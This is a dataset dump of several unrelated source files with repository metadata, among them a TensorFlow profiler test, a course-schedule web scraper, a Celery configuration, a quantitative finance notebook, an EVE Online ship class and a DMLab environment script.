"Apache-2.0"
]
| permissive | AITutorials/tensorflow | 4513de8db4e9bb74b784f5ba865ef8a573b9efc1 | 6bee0d45f8228f2498f53bd6dec0a691f53b3c7b | refs/heads/master | 2022-07-29T13:37:23.749388 | 2020-06-11T17:47:26 | 2020-06-11T17:57:06 | 271,615,051 | 3 | 0 | Apache-2.0 | 2020-06-11T18:07:11 | 2020-06-11T18:07:10 | null | UTF-8 | Python | false | false | 4,426 | py | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf 2.x profiler."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import socket
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
from tensorflow.python.platform import gfile
from tensorflow.python.profiler import profiler_v2 as profiler
from tensorflow.python.profiler import traceme
class ProfilerTest(test_util.TensorFlowTestCase):
def test_profile_exceptions(self):
logdir = self.get_temp_dir()
profiler.start(logdir)
with self.assertRaises(errors.AlreadyExistsError):
profiler.start(logdir)
profiler.stop()
with self.assertRaises(errors.UnavailableError):
profiler.stop()
# Test with a bad logdir, and it correctly raises exception and deletes
# profiler.
# pylint: disable=anomalous-backslash-in-string
profiler.start('/\/\/:123')
# pylint: enable=anomalous-backslash-in-string
with self.assertRaises(Exception):
profiler.stop()
profiler.start(logdir)
profiler.stop()
def test_save_profile(self):
logdir = self.get_temp_dir()
profiler.start(logdir)
with traceme.TraceMe('three_times_five'):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = three * five
self.assertAllEqual(15, product)
profiler.stop()
file_list = gfile.ListDirectory(logdir)
self.assertEqual(len(file_list), 2)
for file_name in gfile.ListDirectory(logdir):
if gfile.IsDirectory(os.path.join(logdir, file_name)):
self.assertEqual(file_name, 'plugins')
else:
self.assertTrue(file_name.endswith('.profile-empty'))
profile_dir = os.path.join(logdir, 'plugins', 'profile')
run = gfile.ListDirectory(profile_dir)[0]
hostname = socket.gethostname()
overview_page = os.path.join(profile_dir, run,
hostname + '.overview_page.pb')
self.assertTrue(gfile.Exists(overview_page))
input_pipeline = os.path.join(profile_dir, run,
hostname + '.input_pipeline.pb')
self.assertTrue(gfile.Exists(input_pipeline))
tensorflow_stats = os.path.join(profile_dir, run,
hostname + '.tensorflow_stats.pb')
self.assertTrue(gfile.Exists(tensorflow_stats))
kernel_stats = os.path.join(profile_dir, run, hostname + '.kernel_stats.pb')
self.assertTrue(gfile.Exists(kernel_stats))
trace_file = os.path.join(profile_dir, run, hostname + '.trace.json.gz')
self.assertTrue(gfile.Exists(trace_file))
def test_profile_with_options(self):
logdir = self.get_temp_dir()
options = profiler.ProfilerOptions(
host_tracer_level=3, python_tracer_level=1)
profiler.start(logdir, options)
with traceme.TraceMe('three_times_five'):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = three * five
self.assertAllEqual(15, product)
profiler.stop()
file_list = gfile.ListDirectory(logdir)
self.assertEqual(len(file_list), 2)
def test_context_manager_with_options(self):
logdir = self.get_temp_dir()
options = profiler.ProfilerOptions(
host_tracer_level=3, python_tracer_level=1)
with profiler.Profile(logdir, options):
with traceme.TraceMe('three_times_five'):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = three * five
self.assertAllEqual(15, product)
file_list = gfile.ListDirectory(logdir)
self.assertEqual(len(file_list), 2)
if __name__ == '__main__':
test.main()
| [
"[email protected]"
]
| |
0a3ce7bc94322d2939e3bc61f528b8c73ede0326 | 0e79ab62d4e433accb7ba29a7145257c4bbba346 | /model/train_interact_tpu.py | c82ec0281216a640ac8595aa3a44e8002b56184e | [
"MIT"
]
| permissive | zeta1999/piglet | 76576fcbd72cba2b7a8e0964b9a984f0cb89d827 | 41fb35a3606415deabb47541e59d9d286c398350 | refs/heads/main | 2023-05-11T04:20:28.684510 | 2021-06-01T00:54:22 | 2021-06-01T00:54:22 | 373,201,430 | 0 | 1 | MIT | 2021-06-02T14:41:05 | 2021-06-02T14:41:04 | null | UTF-8 | Python | false | false | 845 | py | """ Training script! """
import sys
sys.path.append('../')
import tensorflow as tf
from model.neat_config import NeatConfig
from model.interact.modeling import model_fn_builder
from model.interact.dataloader import input_fn_builder
config = NeatConfig.from_args("Train detector script", default_config_file='interact/configs/default_tpu.yaml')
model_fn = model_fn_builder(config)
estimator = tf.contrib.tpu.TPUEstimator(
use_tpu=config.device['use_tpu'],
model_fn=model_fn,
config=config.device['tpu_run_config'],
train_batch_size=config.device['train_batch_size'],
eval_batch_size=config.device['val_batch_size'],
predict_batch_size=config.device['val_batch_size'],
# params={},
)
estimator.train(input_fn=input_fn_builder(config, is_training=True),
max_steps=config.optimizer['num_train_steps']) | [
"[email protected]"
]
| |
304e838e3c7304f8a3cada5e5202249be9c5c479 | a8d68074db5c2b2697650ed0281979d3e00cf5a8 | /Nyspider/duapp2.drexel.edu/TMS.py | 5938794401c1348b9eb96c9578809eba807074c7 | []
| no_license | 15807857476/bogdata-2 | 9595609ea2ae5ae0a48c511f911df2498456467e | 1934cdfa234b77ca91e349b84688db113ff39e8c | refs/heads/master | 2023-05-26T19:10:18.439269 | 2019-05-24T02:50:41 | 2019-05-24T02:50:41 | 188,327,526 | 3 | 1 | null | 2023-05-22T21:37:27 | 2019-05-24T00:53:28 | Python | UTF-8 | Python | false | false | 6,277 | py | #coding:utf-8
import requests
from bs4 import BeautifulSoup
import threading
import re
import os
import xlwt3
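# Scrapes Drexel's Term Master Schedule (webtms): walks quarter -> college ->
# subject pages, fetches every course detail page (one thread per subject),
# and writes one .xls workbook per quarter with a sheet per college.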
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'}
def Get_Quarter():
statue=True
while statue:
try:
html=requests.get('https://duapp2.drexel.edu/webtms_du/app?page=Home&service=page',headers=headers,timeout=30).text
statue=False
except:
continue
table=BeautifulSoup(html,'lxml').find_all('table',attrs={'class':'termPanel'})
quarter={}
for item in table[0].find_all('a'):
quarter[item.get_text()]='https://duapp2.drexel.edu'+item.get('href')
for item in table[1].find_all('a'):
quarter[item.get_text()]='https://duapp2.drexel.edu'+item.get('href')
return quarter
def Get_College(url):
statue=True
while statue:
try:
html=requests.get(url,headers=headers,timeout=30).text
statue=False
except:
continue
table=BeautifulSoup(html,'lxml').find('div',id='sideLeft').find_all('a')
colleges={}
for item in table:
colleges[item.get_text()]='https://duapp2.drexel.edu'+item.get('href')
return colleges
def Get_subjects(url):
statue=True
while statue:
try:
html=requests.get(url,headers=headers,timeout=30).text
statue=False
except:
continue
table=BeautifulSoup(html,'lxml').find('table',attrs={'class':'collegePanel'}).find_all('a')
subjects={}
for item in table:
subjects[item.get_text()]='https://duapp2.drexel.edu'+item.get('href')
return subjects
class CourseInfor(threading.Thread):
def __init__(self,url,name):
super(CourseInfor,self).__init__()
self.url=url
self.name=name
def run(self):
statue=True
while statue:
try:
html=requests.get(self.url,headers=headers,timeout=30).text
statue=False
except:
continue
table=BeautifulSoup(html,'lxml').find('td',attrs={'align':'center'}).find('table').find_all('tr')
self.course_list=[]
courses=[]
for item in table[1:-1]:
course=self.subject_parser(item)
if course==False:
continue
courses.append(course)
for course in courses:
course=self.course_parser(course)
self.course_list.append(course)
print('------'+self.name+'--OK')
def course_parser(self,course):
statue=True
while statue:
try:
html=requests.get(course['url'],headers=headers,timeout=30).text
statue=False
except:
continue
soup=BeautifulSoup(html,'lxml').find('table',attrs={'align':'center','valign':'top'})
baseInforTable=soup.find('td',attrs={'align':'left'}).find_all('td',attrs={'align':'center'})
trs=baseInforTable[0].find_all('tr')
lists=['SubjectCode','CourseNumber','Section','Credits','Title','Campus','Instructors','Instruction_Type','Instruction_Method','Max_Enroll','Enroll','Section_Comments']
for num in range(len(lists)):
try:
course[lists[num]]=trs[num+1].find_all('td')[1].get_text()
except:
course[lists[num]]='--'
table=baseInforTable[1].find('tr',attrs={'class':'even'}).find_all('td')
course['Building']=table[-2].get_text()
course['Room']=table[-1].get_text()
subjectInforText=soup.find('td',attrs={'align':'center','valign':'top'}).get_text()
reText={'College':'College:([\s\S]*)Department','Restrictions':'Restrictions:([\s\S]*)Co-Requisites','Co-Requisites':'Co-Requisites:([\s\S]*)Pre-Requisites','Pre-Requisites':'Pre-Requisites:([\s\S]*)Repeat Status','Repeat Status':'Repeat Status:([\s\S]*)'}
for key in reText:
try:
course[key]=re.findall(reText[key],subjectInforText)[0]
except:
course[key]='--'
return course
def subject_parser(self,item):
course={}
try:
url='https://duapp2.drexel.edu'+item.find('a').get('href')
except:
return False
course['url']=url
course['CRN']=item.find('a').get_text()
course['Times']=item.find('table').get_text()
return course
def Get_Course(Quarter,college,subjects):
print(Quarter+'--'+college+'--Start')
excel=xlwt3.Workbook()
threadings=[]
for subject in subjects:
work=CourseInfor(subjects[subject], subject)
threadings.append(work)
for work in threadings:
work.setDaemon(True)
work.start()
for work in threadings:
work.join()
sheet=excel.add_sheet(college)
count=0
lists=['SubjectCode','CourseNumber','CRN','Section','Credits','Times','Title','Campus','Instructors','Instruction_Type'
,'Instruction_Method','Max_Enroll','Enroll','Section_Comments','Building','Room','College','Restrictions','Co-Requisites','Pre-Requisites','Repeat Status','url']
for work in threadings:
for course in work.course_list:
for num in range(len(lists)):
sheet.write(count,num,course[lists[num]])
count+=1
print(Quarter+'--'+college+'--OK')
excel.save(Quarter+'/'+college+'.xls')
def main():
quarter=Get_Quarter()
for key in quarter:
colleges=Get_College(quarter[key])
try:
os.mkdir(key)
except:
print('--')
threadings=[]
for college in colleges:
subjects=Get_subjects(colleges[college])
work=threading.Thread(target=Get_Course,args=(key, college, subjects))
threadings.append(work)
for work in threadings:
work.setDaemon(True)
work.start()
for work in threadings:
work.join()
print('----------'+key+'--OK----------')
main()
| [
"[email protected]"
]
| |
139bab4db8371e55144c6a767edd8121e9e1726d | 817f7dfb035af90b4c7f810c72eb7b407ea28c99 | /pingdumb/taskapp/celery.py | 7b13583c61674dfea5219ebd72f04285f69c7100 | [
"MIT"
]
| permissive | rubythonode/pingdumb-django | bd7e361a7d6886db81d9bdad78ef62d375ad768a | 750a26f7c55eb176f6fd0f5b655751ee2d114d9e | refs/heads/master | 2021-01-12T01:51:18.192362 | 2016-12-14T04:50:42 | 2016-12-14T04:50:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,110 | py |
from __future__ import absolute_import
import os
from celery import Celery
from django.apps import apps, AppConfig
from django.conf import settings
if not settings.configured:
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local') # pragma: no cover
app = Celery('pingdumb')
class CeleryConfig(AppConfig):
name = 'pingdumb.taskapp'
verbose_name = 'Celery Config'
def ready(self):
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
installed_apps = [app_config.name for app_config in apps.get_app_configs()]
app.autodiscover_tasks(lambda: installed_apps, force=True)
if hasattr(settings, 'RAVEN_CONFIG'):
# Celery signal registration
from raven import Client as RavenClient
from raven.contrib.celery import register_signal as raven_register_signal
from raven.contrib.celery import register_logger_signal as raven_register_logger_signal
raven_client = RavenClient(dsn=settings.RAVEN_CONFIG['DSN'])
raven_register_logger_signal(raven_client)
raven_register_signal(raven_client)
if hasattr(settings, 'OPBEAT'):
from opbeat.contrib.django.models import client as opbeat_client
from opbeat.contrib.django.models import logger as opbeat_logger
from opbeat.contrib.django.models import register_handlers as opbeat_register_handlers
from opbeat.contrib.celery import register_signal as opbeat_register_signal
try:
opbeat_register_signal(opbeat_client)
except Exception as e:
opbeat_logger.exception('Failed installing celery hook: %s' % e)
if 'opbeat.contrib.django' in settings.INSTALLED_APPS:
opbeat_register_handlers()
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request)) # pragma: no cover
| [
"[email protected]"
]
| |
0eca868fb731e2726e52062354a6937d43dade2f | cc2bb9ccc66783ac7d37454e4784df5e4a2d80f4 | /close_server_one.py | 34b036b30e1c44c412f1356dfc39352cae3581da | []
| no_license | ronnyzh/Tornado_Server | f308b7e9c2112167b04cbe324e37b1f891999187 | 42112d39e4dea128d059dbfa53c410f3774dc4b1 | refs/heads/master | 2021-05-22T22:10:26.694262 | 2020-04-04T23:39:14 | 2020-04-04T23:39:14 | 253,118,839 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | # -*- coding:utf-8 -*-
# !/bin/python
"""
Author: ronnyzh
Date: 2019/11/15
Revision: 1.0.0
Description: Description
"""
from model.model_redis import getInst
from define.define_redis_key import *
IP = '192.168.50.2'
PORT = '9797'
if __name__ == '__main__':
redis = getInst()
ipKey = Key_Server_Order % ('%s:%s' % (IP, PORT))
redis.lpush(ipKey, 'closeServer')
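    # The server listening on IP:PORT is expected to pop commands from this
    # per-address list (Key_Server_Order) and shut down on 'closeServer';
    # the consumer side lives elsewhere in this repo.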
| [
"[email protected]"
]
| |
c336b550745a3945d4d397f07f31e0af46fe95d7 | 8517c5849cec02cfd52d5a20d8c5468227f60c0d | /kozmic/repos/views.py | 3504ff09546983cc581849ca6a165f7e6b3613e0 | []
| no_license | aromanovich/kozmic-ci | 87475a27c3b47f0e4f226aef9856b3f39ed911e5 | 368ceb992b7b9b6ceb099570f9291655cad9e96c | refs/heads/master | 2021-01-19T02:00:55.573742 | 2016-06-14T04:45:10 | 2016-06-14T04:45:10 | 14,984,166 | 26 | 6 | null | 2016-06-14T04:45:10 | 2013-12-06T14:03:31 | Python | UTF-8 | Python | false | false | 4,622 | py | import datetime
import logging
import collections
from flask import (current_app, flash, request, render_template, redirect,
url_for, abort)
from flask.ext.login import current_user
from kozmic import db
from kozmic.models import User, Organization, Project, DeployKey
from . import bp
logger = logging.getLogger(__name__)
@bp.route('/')
def index():
user_repositories = current_user.repositories.with_entities(
db.literal(current_user.gh_login).label('gh_owner_login'),
User.Repository.gh_id.label('gh_id'),
User.Repository.gh_full_name.label('gh_full_name'))
user_org_repositories = current_user.organizations.join(
Organization.Repository
).with_entities(
Organization.gh_login.label('gh_owner_login'),
Organization.Repository.gh_id.label('gh_id'),
Organization.Repository.gh_full_name.label('gh_full_name'),
)
repositories = user_repositories.union_all(user_org_repositories).subquery()
repositories_without_project = db.session.query(repositories).outerjoin(
Project, repositories.c.gh_id == Project.gh_id
).filter(Project.id == None).all()
repositories_by_owner = collections.defaultdict(list)
for gh_owner_login, gh_id, gh_full_name in repositories_without_project:
repositories_by_owner[gh_owner_login].append((gh_id, gh_full_name))
return render_template(
'repos/index.html', repositories_by_owner=repositories_by_owner)
@bp.route('/sync/')
def sync():
"""Updates the organizations and repositories to which
the user has admin access.
"""
# Delete all the old repositories and organizations
# (don't do batch delete to let ORM-level cascades work)
for repo in current_user.repositories:
db.session.delete(repo)
for org in current_user.organizations:
db.session.delete(org)
# Fill the user's organizations and their repositories
gh_orgs, gh_repos_by_org_id = current_user.get_gh_org_repos()
for gh_org in gh_orgs:
org = Organization(
gh_id=gh_org.id,
gh_login=gh_org.login,
gh_name=gh_org.name)
for gh_repo in gh_repos_by_org_id[gh_org.id]:
repo = Organization.Repository.from_gh_repo(gh_repo)
org.repositories.append(repo)
current_user.organizations.append(org)
# Fill the user's own repositories
for gh_repo in current_user.get_gh_repos():
repo = User.Repository.from_gh_repo(gh_repo)
current_user.repositories.append(repo)
current_user.repos_last_synchronized_at = datetime.datetime.utcnow()
db.session.commit()
return redirect(url_for('.index'))
@bp.route('/<int:gh_id>/on/', methods=('POST',))
def on(gh_id):
"""Creates :class:`app.models.Project` for GitHub repository
with `gh_id`.
"""
# First try to find the user's repository with `gh_id`
repo = (current_user.repositories
.filter(User.Repository.gh_id == gh_id).first())
# If not found, try to find such a repository among
# the user organizations' repositories
repo = repo or (current_user.organizations
.join(Organization.Repository)
.filter(Organization.Repository.gh_id == gh_id)
.with_entities(Organization.Repository).first())
if not repo:
abort(404)
if Project.query.filter_by(gh_id=repo.gh_id).first():
# If project for repository with `gh_id` already exists,
# we should show page where the user can ask for an invite
# to the existing project.
# For now just show 400
abort(400)
project = Project(
owner=current_user,
gh_id=repo.gh_id,
gh_name=repo.gh_name,
gh_full_name=repo.gh_full_name,
gh_login=repo.parent.gh_login,
gh_ssh_clone_url=repo.gh_ssh_clone_url,
gh_https_clone_url=repo.gh_https_clone_url,
is_public=repo.is_public)
db.session.add(project)
ok_to_commit = True
if not project.is_public:
project.deploy_key = DeployKey(passphrase=project.passphrase)
ok_to_commit = ok_to_commit and project.deploy_key.ensure()
ok_to_commit = ok_to_commit and project.sync_memberships_with_github()
if ok_to_commit:
db.session.commit()
return redirect(url_for('projects.settings', id=project.id))
else:
db.session.rollback()
flash('Sorry, failed to create a project. Please try again later.',
'warning')
return redirect(url_for('.index'))
| [
"[email protected]"
]
| |
8dea07b740dc7aa5edb7b8bddc428d35e75352e9 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_207/ch63_2020_04_27_14_28_14_916924.py | 933bea65d7d30470bdf2ae03c973f2452f1202e2 | []
| no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py | def nome_usuario (string):
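    # Return the part of an e-mail address before the '@' (the username).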
pos = string.find('@')
nome = string[:pos]
return nome
| [
"[email protected]"
]
| |
945f3b5e2ce68a78a710408a838215d972d40c1a | 3740de0d6e43ea140fc09ab314e4c492603ba185 | /scripts/sources/s_generalized_flam_toy.py | 7cc7fd1ff125b384c9bb6a7535b3cfea5e5b6ec7 | [
"MIT"
]
| permissive | s0ap/arpmRes | 29c60c65fd3e11be1cc31d46494e5b3ebf6e05ab | ddcc4de713b46e3e9dcb77cc08c502ce4df54f76 | refs/heads/master | 2022-02-16T05:01:22.118959 | 2019-08-20T16:45:02 | 2019-08-20T16:45:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,933 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.1.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # s_generalized_flam_toy [<img src="https://www.arpm.co/lab/icons/icon_permalink.png" width=30 height=30 style="display: inline;">](https://www.arpm.co/lab/redirect.php?code=s_generalized_flam_toy&codeLang=Python)
# For details, see [here](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy).
# +
import numpy as np
from arpym.statistics import objective_r2, simulate_normal
from arpym.tools import solve_riccati
# -
# ## [Input parameters](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-parameters)
# +
rho = 0.3
epsi = 0.45
s = np.array([[0.3], [0.1]])
w = np.array([[1], [-3]])
sig = 1
sig2 = np.array([[1, 0.5, epsi, epsi],
[0.5, 1, epsi, epsi],
[epsi, epsi, 1, rho],
[epsi, epsi, rho, 1]])
# -
# ## [Step 1](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step01): conditional expectation and covariance
# +
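# The helpers below implement the standard normal conditioning formulas:
#   E[X|S=s]   = sig2_xs @ inv(sig2_ss) @ s
#   Cov[X|S=s] = sig2_xx - sig2_xs @ inv(sig2_ss) @ sig2_sx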
def cond_exp_x(s, k=2, sig2=sig2):
return sig2[:2, -k:] @ np.linalg.solve(sig2[-k:, -k:], s)
def cond_cov_x(k=2, sig2=sig2):
return sig2[:2, :2] - sig2[:2, -k:] @ np.linalg.solve(sig2[-k:, -k:],
sig2[:2, -k:].T)
cond_mu_x = cond_exp_x(s)
cond_sig2_x = cond_cov_x()
# -
# ## [Step 2](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step02): Max of cond. info ratio and combination at which is attained
w_sig = sig * np.linalg.solve(cond_sig2_x, cond_mu_x) / \
np.sqrt(cond_mu_x.T @ np.linalg.solve(cond_sig2_x, cond_mu_x))
max_ir = w_sig.T @ cond_mu_x / np.sqrt(w_sig.T @ cond_sig2_x @ w_sig)
# ## [Step 3](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step03): Max of cond. info ratio via flam and transfer coefficient
max_ir_flam = np.sqrt(cond_mu_x.T @ np.linalg.solve(cond_sig2_x,
cond_mu_x))
ir_arb = w.T @ cond_mu_x / np.sqrt(w.T @ cond_sig2_x @ w)
tc = ir_arb / max_ir_flam
# ## [Step 4](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step04): Max. unconditional info ratios
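# (The checks below ask whether squared max info ratios add across signals,
# maxIR_{1,2}^2 = maxIR_1^2 + maxIR_2^2; with correlated signals the printed gap
# is generally nonzero, while it closes for weak, independent signals.)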
# +
def uncond_max_ir(k, sig2=sig2):
# Monte Carlo scenarios for the signals
s_j = simulate_normal(np.zeros((2)), sig2[-2:, -2:], 1000).T
cond_mu_x_j = cond_exp_x(s_j[:k, :], k, sig2)
# Monte Carlo scenarios for the conditioned max info ratio
max_ir_j = cond_mu_x_j.T @ \
np.linalg.solve(cond_cov_x(k, sig2),
cond_mu_x_j)
return np.sqrt(np.trace(max_ir_j) / 1000)
uncond_maxir_12 = uncond_max_ir(2)
uncond_maxir_1 = uncond_max_ir(1)
uncond_maxir_2 = uncond_max_ir(1)
print(uncond_maxir_12**2 - (uncond_maxir_1**2 + uncond_maxir_2**2))
# verify that (epsi << 1) implies weak signals
sig2_weak = np.array([[1, 0.5, 0.1, 0.1],
[0.5, 1, 0.1, 0.1],
[0.1, 0.1, 1, rho],
[0.1, 0.1, rho, 1]])
print(cond_cov_x(2, sig2_weak))
print(sig2[:2, :2])
# independent signals (rho = 0) and weak correlation (epsi << 1)
sig2_weak_ind = np.array([[1, 0.5, 0.1, 0.1],
[0.5, 1, 0.1, 0.1],
[0.1, 0.1, 1, 0],
[0.1, 0.1, 0, 1]])
maxir_12_weak_ind = uncond_max_ir(2, sig2_weak_ind)
maxir1_weak_ind = uncond_max_ir(1, sig2_weak_ind)
maxir2_weak_ind = uncond_max_ir(1, sig2_weak_ind)
print(maxir_12_weak_ind**2 - (maxir1_weak_ind**2 +
maxir2_weak_ind**2))
# -
# ## [Step 5](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step05): information coefficients
# +
def ic(k, sig2=sig2):
return np.sqrt(2 * objective_r2(np.arange(k), sig2, 2, sig2[:2, :2]))
ic_12 = ic(2)
ic_1 = ic(1)
ic_2 = ic(1)
print(ic_12**2 - (ic_1**2 + ic_2**2))
# independent signals (rho = 0)
sig2_ind = np.array([[1, 0.5, epsi, epsi],
[0.5, 1, epsi, epsi],
[epsi, epsi, 1, 0],
[epsi, epsi, 0, 1]])
ic_12_ind = ic(2, sig2_ind)
ic_1_ind = ic(1, sig2_ind)
ic_2_ind = ic(1, sig2_ind)
print(ic_12_ind**2 - (ic_1_ind**2 + ic_2_ind**2))
# -
# ## [Step 6](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step06): linkage matrix
# +
def linkage(sig2=sig2):
return np.linalg.solve(solve_riccati(sig2[:2, :2]),
np.linalg.solve(solve_riccati(sig2[2:, 2:]).T,
sig2[:2, 2:].T).T)
p_s_x = linkage(sig2)
# -
# ## [Step 7](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step07): Fundamental law of active management (weak signals)
# +
sig2_weak = np.array([[1, 0.5, 0.1, 0.1],
[0.5, 1, 0.1, 0.1],
[0.1, 0.1, 1, rho],
[0.1, 0.1, rho, 1]])
p_s_x_weak = linkage(sig2_weak)
# information coefficient
ic_linkage = np.sqrt(np.trace(p_s_x_weak @ p_s_x_weak.T))
# max information ratio
s_tilde = np.linalg.solve(solve_riccati(sig2_weak[2:, 2:]), s)
maxir_linkage = uncond_max_ir(2, sig2=sig2_weak)
print(maxir_linkage**2 - ic_linkage**2)
# -
# ## [Step 8](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step08): Fundamental law of active management (weak and ind. signals)
# +
p_s_x_weak_ind = linkage(sig2_weak_ind)
# information coefficient (single signal)
ic_linkage_1 = np.sqrt(np.trace(p_s_x_weak_ind[:, [0]] @ p_s_x_weak_ind[:, [0]].T))
print(ic_linkage_1 * np.sqrt(2) - maxir_12_weak_ind)
| [
"[email protected]"
]
| |
34dadc42e9085d239b0e37efcf94d7e7460e7403 | 8fcc27160f8700be46296568260fa0017a0b3004 | /client/eve/client/script/environment/spaceObject/entityShip.py | 253efe958a9487e51db0b4662828ae06dbef0567 | []
| no_license | connoryang/dec-eve-serenity | 5d867f4eedfa896a4ef60f92556356cafd632c96 | b670aec7c8b4514fc47cd52e186d7ccf3aabb69e | refs/heads/master | 2021-01-22T06:33:16.303760 | 2016-03-16T15:15:32 | 2016-03-16T15:15:32 | 56,389,750 | 1 | 0 | null | 2016-04-16T15:05:24 | 2016-04-16T15:05:24 | null | UTF-8 | Python | false | false | 3,545 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\environment\spaceObject\entityShip.py
import blue
import destiny
from eve.client.script.environment.spaceObject.spaceObject import SpaceObject
from eve.client.script.environment.spaceObject.ship import Ship
from eve.client.script.environment.model.turretSet import TurretSet
import eve.common.lib.appConst as const
import evetypes
class EntityShip(Ship):
launcherTypeCache = {}
def __init__(self):
Ship.__init__(self)
self.gfxTurretID = None
self.fitted = False
self.typeID = None
self.modules = {}
self.model = None
self.launcherTypeID = None
def LoadModel(self, fileName = None, loadedModel = None):
godma = self.sm.GetService('godma')
godmaStateManager = godma.GetStateManager()
godmaType = godmaStateManager.GetType(self.typeID)
self.turretTypeID = godmaType.gfxTurretID
missileTypeID = godmaType.entityMissileTypeID
self.launcherTypeID = self.DetermineLauncherTypeFromMissileID(self.typeID, missileTypeID)
SpaceObject.LoadModel(self)
def Assemble(self):
Ship.Assemble(self)
self.FitBoosters(isNPC=True)
self.SetupSharedAmbientAudio()
def DetermineLauncherTypeFromMissileID(self, typeID, missileTypeID):
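        # Resolve (and memoize in launcherTypeCache) the launcher type that fires
        # this entity's missile type, by looking up the missile's launcherGroup
        # attribute and picking a matching type from that group.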
launcherType = self.launcherTypeCache.get(missileTypeID, None)
if launcherType:
return launcherType
clientDogma = self.sm.GetService('clientDogmaStaticSvc')
usesMissiles = clientDogma.TypeHasEffect(typeID, const.effectMissileLaunchingForEntity)
if not usesMissiles:
return
godma = self.sm.GetService('godma')
group = int(godma.GetTypeAttribute2(missileTypeID, const.attributeLauncherGroup))
for typeID in evetypes.GetTypeIDsByGroup(group):
if typeID in cfg.invmetatypesByParent:
launcherType = typeID
self.launcherTypeCache[missileTypeID] = launcherType
break
return launcherType
def LookAtMe(self):
if self.model is None:
return
if not self.fitted:
self.FitHardpoints()
def FitHardpoints(self, blocking = False):
if self.model is None:
self.LogWarn('FitHardpoints - No model')
return
if self.fitted:
return
self.fitted = True
turretLocatorCount = int(self.model.GetTurretLocatorCount())
if self.launcherTypeID:
launcherSet = TurretSet.FitTurret(self.model, self.launcherTypeID, turretLocatorCount, count=1)
self.modules[0] = launcherSet
turretLocatorCount = max(turretLocatorCount - 1, 1)
newTurretSet = TurretSet.FitTurret(self.model, self.turretTypeID, -1, count=turretLocatorCount)
if newTurretSet is not None:
self.modules[self.id] = newTurretSet
def Release(self):
if self.released:
return
for turretPair in self.modules.itervalues():
if turretPair is not None:
turretPair.Release()
turretPair.owner = None
self.modules = {}
Ship.Release(self)
class EntitySleeper(EntityShip):
def FitHardpoints(self, blocking = False):
if self.launcherTypeID:
self.launcherTypeID = 0
EntityShip.FitHardpoints(self)
| [
"[email protected]"
]
| |
4498670807eaeaf54a06134d1ce03533c8bc8c45 | ca8167a83eaec916437c0fdd757a76bb0441a5a3 | /envs/dmlab/dmlab_populate_cache.py | 495f3a7c761a2d9edb2d33b8079a14dbf225b782 | [
"Apache-2.0"
]
| permissive | Zhehui-Huang/scalable_agent | b470afe0130e95d2e63e521abd7bf61016e5e358 | 505909ad9f2d3e9bce8bb9201e05e780002428df | refs/heads/master | 2022-04-25T23:21:40.302551 | 2020-02-03T07:43:35 | 2020-02-03T07:43:35 | 257,515,137 | 0 | 0 | Apache-2.0 | 2020-04-21T07:33:26 | 2020-04-21T07:33:25 | null | UTF-8 | Python | false | false | 850 | py | import sys
from algorithms.utils.multi_env import MultiEnv
from envs.dmlab.dmlab_utils import DmlabGymEnv
from utils.utils import log
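# Repeatedly resets a pool of DMLab environments so that freshly generated
# levels get written into the DMLab level cache.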
def main():
def make_env(env_config):
env = DmlabGymEnv('contributed/dmlab30/rooms_watermaze', 4)
return env
num_envs = 64
num_workers = 16
multi_env = MultiEnv(num_envs, num_workers, make_env, stats_episodes=100)
num_resets = 0
try:
while True:
multi_env.reset()
num_resets += 1
num_envs_generated = num_resets * num_envs
log.info('Generated %d environments...', num_envs_generated)
except (Exception, KeyboardInterrupt, SystemExit):
log.exception('Interrupt...')
